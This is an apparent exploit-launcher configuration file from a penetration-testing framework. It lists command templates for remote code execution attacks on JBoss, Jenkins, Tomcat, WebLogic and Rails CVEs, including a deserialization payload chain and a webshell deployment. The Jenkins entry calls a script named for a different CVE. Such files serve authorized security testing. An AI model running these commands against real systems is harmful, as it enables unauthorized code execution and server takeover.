

[jboss-cve-2015-7501]
description = JBoss Deserialize RCE (CVE-2015-7501)
type = rce-blind
command = python2.7 jboss-cve-2015-7501.py --proto http[SSL true="s"] [IP]:[PORT] '[CMD]'


[jenkins-cve-2016-0792]
description = Jenkins Groovy XML RCE (CVE-2016-0792)
type = rce-blind
command = python2.7 jenkins-cve-2015-7501.py --proto http[SSL true="s"] [IP]:[PORT] '[CMD]'


[tomcat-cve-2017-12617]
description = Apache Tomcat JSP Upload Bypass RCE (CVE-2017-12617)
type = rce-standard
command = python2.7 tomcat-cve-2017-12617.py -u [URL]
success = Vulnerable to CVE-2017-12617


[weblogic-cve-2015-4852]
description = Weblogic T3(s) Deserialize RCE (CVE-2015-4852)
type = rce-blind
command = python2.7 loubia.py [IP] [PORT] [SSL true="-s"] -o lin -c '[CMDLINUX]' -v; python2.7 loubia.py [IP] [PORT] [SSL true="-s"] -o win -c '[CMDWINDOWS]' -v


[weblogic-cve-2016-3510]
description = Weblogic T3 Deserialize (CVE-2016-3510)
type = rce-blind
command = python2.7 weblogic-cve-2016-3510.py [IP]:[PORT] '[CMD]'


[weblogic-cve-2017-10271]
description = Weblogic WLS-WSAT RCE (CVE-2017-10271)
type = rce-blind
command = python2.7 exploit.py [URL] '[CMD]'


[weblogic-cve-2018-2893]
description = Weblogic T3(s) Deserialize RCE (CVE-2018-2893)
type = rce-blind
command = java -jar ysoserial-cve-2018-2893.jar JRMPClient4 '[CMD]' > /tmp/payload.ser; python2.7 weblogic.py [IP] [PORT] /tmp/payload.ser; rm /tmp/payload.ser


[weblogic-cve-2018-2894]
description = Weblogic Unauthenticated Webshell deploiement (CVE-2018-2894)
type = rce-standard
command = python3 weblogic-cve-2018-2894.py -t [URL]
success = vulnerable to CVE-2018-2894


[rails-cve-2019-5420]
description = File Content Disclosure (CVE-2019-5418) + RCE (CVE-2019-5420) On Ruby on Rails
type = rce-standard
command = ruby rails-cve-2019-5420.rb http[SSL true="s"]://[IP]:[PORT] [URIPATH] '[CMD]'
success = Vulnerable to CVE-2019-5420